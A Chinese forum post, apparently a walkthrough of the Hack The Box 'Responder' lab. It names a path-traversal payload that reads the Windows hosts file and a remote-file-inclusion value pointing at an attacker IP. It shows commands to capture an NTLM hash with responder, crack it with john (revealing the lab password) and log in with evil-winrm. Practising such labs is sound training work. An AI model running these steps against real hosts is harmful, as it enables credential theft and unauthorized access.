首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
软件与程序人生
›
后端开发
›
Java
›
hack the box responder
返回列表
发新帖
hack the box responder
[复制链接]
发表于 2023-4-10 00:28:07
|
显示全部楼层
|
阅读模式
使用 IP 地址访问 Web 服务时,我们要重定向到的域是什么?
服务器
上使用哪种脚本语言来生成网页?
抓取返回包判断
用于加载网页不同语言
版本
的 URL 参数的名称是什么?
根据提示,切换语言,可以发现答案是page
“page”参数的以下哪一个值是利用本地文件包含 (LFI) 漏洞的示例:“法语.html”、“
//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“,
”minikatz.exe”
“page”参数的以下哪一个值是利用远程文件包含 (RFI) 漏洞的示例:“法语.html”、“
//10.10.14.6/somefile”、“../../../../../../../../Windows/system32/drivers/etc/hosts“,
”minikatz.exe”
NTLM 代表什么?
我们在响应程序实用程序中使用哪个标志来指定网络接口?
administrator用户的密码是什么?
回答:badminton
首先启动responder并监听本地的tun0网卡,然后由于靶机存在RFI,因此可以远程访问本地的某个文件,使用responder拿到主机的administrator的哈希,然后使用john破解
使用responder监听本地tun0网卡
responder -I tun0
john 破解hash
我们将使用 Windows 服务(即在机器上运行)使用我们恢复的密码远程访问响应程序计算机。它侦听什么端口 TCP?
使用evil-winrm 进行登录
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
继续阅读请点击广告
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
回复
使用道具
举报
返回列表
浏览过的版块
分布式数据库
梦见你的名字
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表